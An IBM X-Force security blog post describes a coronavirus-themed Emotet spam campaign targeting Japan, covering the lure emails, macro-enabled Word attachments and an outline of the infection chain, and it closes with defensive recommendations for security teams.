IBM X-Force has identified a spam campaign targeting users in Japan that employs the coronavirus scare as a lure to encourage people to open malicious emails. The messages contain Microsoft Office files loaded with macros that, when enabled, launch an infection routine that delivers the Emotet Trojan.

In general, Emotet is very focused on infecting companies in North America and some parts of Europe, but we are seeing it diversify its activity in the past few months. Is Emotet changing its attack turf by spamming in Japan? Emotet has been provisioning access for the TrickBot gang, especially where Ryuk ransomware attacks follow. With TrickBot operating more frequently in Japan, it is no surprise that Emotet is expanding its reach in the region.

Japan is also becoming a more lucrative target for all cybercrime groups ahead of the 2020 Olympic games, which are scheduled to take place in the country’s capital in the summer of 2020.

A Timely Spam Campaign

How did Emotet get to write coherent spam in Japanese? Copies of the emails used in the Emotet campaign were apparently compromised legitimate emails concerning the Coronavirus outbreak. Some of the email samples that IBM X-Force researchers have captured in our spam traps show details that would make this spam appear quite legitimate.

Figure 1: Sample emails from spam captured by IBM X-Force research

Machine translation of the text provides the email’s context:

Jurisdiction Tsusho / Facility Related Disability Welfare Service Provider We become indebted to. Patients were reported about the new type of coronavirus-related pneumonia, mainly in Takeshi, China. In Japan, patients are being reported in Osaka Prefecture. Along with the anticipated increase in the number of visitors to Japan, a separate notice has been issued. Therefore, please check the attached notice.

As an example, the following footer on one of the email formats included information from the legitimate website of the Kyoto prefecture:

Kyoto Prefectural Yamashiro Minami Public Health Center welfare room (in charge: Umino) 18-1 Kizu Ueto, Kizugawa City, Kyoto Prefecture 619-0214, Japan Telephone: 0774-72-0979 FAX: 0774-72-8412

Inside the spam, those who click to read the message will find a rather standard poisoned Word file with macros to enable.

Figure 2: Emotet infection launcher concealed in a Word document (Source: IBM X-Force)

The infection flow is also familiar from other recent Emotet infection routines, starting with malicious PowerShell scripts that end up fetching and running executable files. The eventual payload is an Emotet Trojan file:

Figure 3: Emotet infection routine as observed via spam emails in Japan (Source: IBM X-Force)

For indicators of compromise (IoCs) from this campaign, check out our X-Force Exchange collection.

Keep Botnet Spam Out of Your Networks

Cybercriminals are fond of riding trending news subjects to spread malspam. The more resilient ones may get through some security controls, which can make keeping sophisticated, self-propagating malware out of enterprise networks a bit of a challenge. Here are some tips that can help security teams reduce the risk of infection via botnet spam:

  • Have an incident response plan that corresponds with a threat like Emotet. Since this malware can usher in a widespread ransomware attack, your teams will have to quickly escalate, contain and remedy it before further damage can take place.
  • Educate users about threats like Emotet and its specific tactics of inserting itself into conversations to lure email recipients into opening attachments.
  • Ensure systems are patched on time.
  • Update endpoint detection and response (EDR) and anti-virus solutions deployed throughout your environment.
  • Segregate networks to limit the reach of self-propagating malware.
  • Review privileged access and privileged users to enforce principles of least privilege.
  • Keep up to date on blacklists of malicious IPs and compromised websites malware uses to spread.
  • Use an email security tool that features attachment inspection and disable the ability to run macros from attachments if your business does not use them frequently.
  • Keep up to date on threat intelligence that can help you stay aware of emerging campaigns and talk to your teams about them.

Advanced malware protection solutions can help mitigate the risk of infection by Emotet and other banking Trojans. If your team requires incident response support, please contact the IBM X-Force Incident Response and Intelligence Services (IRIS) team.

For security incident emergencies, contact us at: US hotline 1-888-241-9812 | Global hotline (+001) 602-220-1440

More from Malware

Strela Stealer: Today’s invoice is tomorrow’s phish

12 min read - As of November 2024, IBM X-Force has tracked ongoing Hive0145 campaigns delivering Strela Stealer malware to victims throughout Europe - primarily Spain, Germany and Ukraine. The phishing emails used in these campaigns are real invoice notifications, which have been stolen through previously exfiltrated email credentials. Strela Stealer is designed to extract user credentials stored in Microsoft Outlook and Mozilla Thunderbird. During the past 18 months, the group tested various techniques to enhance its operation's effectiveness. Hive0145 is likely to be…

Hive0147 serving juicy Picanha with a side of Mekotio

17 min read - IBM X-Force tracks multiple threat actors operating within the flourishing Latin American (LATAM) threat landscape. X-Force has observed Hive0147 to be one of the most active threat groups operating in the region, targeting employee inboxes at scale, with a primary focus on phishing and malware distribution. After a 3-month break, Hive0147 returned in July with even larger campaign volumes, and the debut of a new malicious downloader X-Force named "Picanha,” likely under continued development, deploying the Mekotio banking trojan. Hive0147…

Ongoing ITG05 operations leverage evolving malware arsenal in global campaigns

13 min read - As of March 2024, X-Force is tracking multiple ongoing ITG05 phishing campaigns featuring lure documents crafted to imitate authentic documents of government and non-governmental organizations (NGOs) in Europe, the South Caucasus, Central Asia, and North and South America. The uncovered lures include a mixture of internal and publicly available documents, as well as possible actor-generated documents associated with finance, critical infrastructure, executive engagements, cyber security, maritime security, healthcare, business, and defense industrial production. Beginning in November 2023, X-Force observed ITG05…

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today